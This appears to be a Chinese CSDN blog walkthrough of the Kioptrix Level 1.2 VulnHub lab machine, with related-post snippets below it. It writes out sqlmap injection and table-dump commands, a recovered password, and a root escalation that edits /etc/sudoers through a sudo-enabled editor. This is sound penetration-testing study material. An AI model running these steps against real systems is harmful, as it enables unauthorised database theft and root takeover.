Kioptrix _ Level 1.2

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量418 收藏 4
点赞数 5
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67480384/article/details/142321702
版权

ip地址扫描

端口扫描

访问80端口

点击login

发现为LotusCMS

发现url上有id=1,在1后加’ 测试sql注入

发现可能存在sql注入

sqlmap测试

sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" --batch

存在sql注入

sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" --current-db --batch

查询数据库名

sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" -D gallery --tables --batch

查询表名

sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" -D gallery -T dev_accounts --dump --batch

查看dev_accounts表

-u

查看gallarific_users表

发现账户名:admin 密码:n0t7t1k4

发现用户名和密码

尝试通过用户名和密码进行登录,发现密码不正确

尝试ssh连接

连接失败,因为openssh 7.0之后的版本不支持ssh-dss(DSA)算法

查看ssh版本:ssh -V

解决办法

在每次指令之后加上-oHostKeyAlgorithms=+ssh-dss
或者-oHostKeyAlgorithms=+ssh-dsa: ssh -oHostKeyAlgorithms=+ssh-dsa root@192.168.0.102

利用ssh连接

发现dreg没有sudo 权限

切换loneferret用户

执行sudo -l 查看

进行提权

查看loneferret家目录的信息

查找SUID可执行文件

发现存在/user/local/bin/ht

发现<font style="color:rgb(21, 167, 167);">ht编辑器</font><font style="color:rgb(21, 167, 167);">sudo -l</font>发现该编辑器被分配root权限。如果编辑/etc/sudoers,权限添加/bin/bash,可以直接拿root的shell了。

执行sudo /usr/local/bin/ht

//报错Error opening terminal: xterm-256color.则 export TERM=xterm //ht编辑器修改/etc/sudoers

执行sodo /bin/bash 提权成功

Sɪʟᴇɴᴛོ.498
关注
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1092
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Vulnhub靶机:Kioptrix_Level1.2
qq_48904485的博客
03-14 470
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Kioptrix : Level 1.2
weixin_53626662的博客
07-31 566
F3查找 /etc/sudoers 然后在loneferrt后加,/bin/bash。发现有3.0版本漏洞,下载 lotusCMS payload。5.直接执行 sudo ht不行,看看可以执行什么。1)将收集到的url参数放到sqlmap中跑。4)查看表下字段user和accounts。3.查看/etc/passwd,有利用漏洞。7.执行 sudo /bin/bash。6.再次执行sudo ht,启动成功。获得交互式shell命令。kali监听,监听成功。3)查询数据库下的表。1.查看内核版本信息。
KIOPTRIX: LEVEL 1.2 (#3)
Mysmycbx的博客
03-21 248
发现是lotusCMS,在searchsploit上搜索,没有发现什么有用的信息,那就去google上搜索。发现github里有一个RCE的sh文件,这里下载下来查看。发现mysql数据库内容,这里尝试ssh登录,发现失败,那就进入mysql查看后台数据。没发现什么有用的信息。
【vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 324
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 399
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
【vulnhub】Kioptrix : Level 1.2
wbplife的博客
07-29 306
使用了一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit。将exp下载下来,使用web服务上传到靶机,编译执行,在/etc/passwd文件写入一个具有root权限的用户。使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞。运行这个编译过后的文件,设置密码123456,会自动生成一个用户,跳转到这个用户。监听444端口,因为从下载的文件说明中可知,监听端口必须是444。
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1244
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
Kioptrix Level-1.2靶机
2401_84564260的博客
07-30 484
下面是 /etc/sudoers 文件的一个片段。编辑文件,以便我们可以无限制地使用 sudo。需要先在C:\windows\system32\drivers\etc\hosts映射ip。更改为 loneferret ALL=(ALL) NOPASSWD: ALL。发现url中可能存在sql注入 使用sqlmap进行测试。查看 CompanyPolicy.README文件。输入 ls 得到congrats.txt文件。使用 ls 查看更多信息 发现两个文件。检查一下sudo文件的内容。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8478
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 657
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 499
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1362
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 292
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 907
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 405
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1141
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值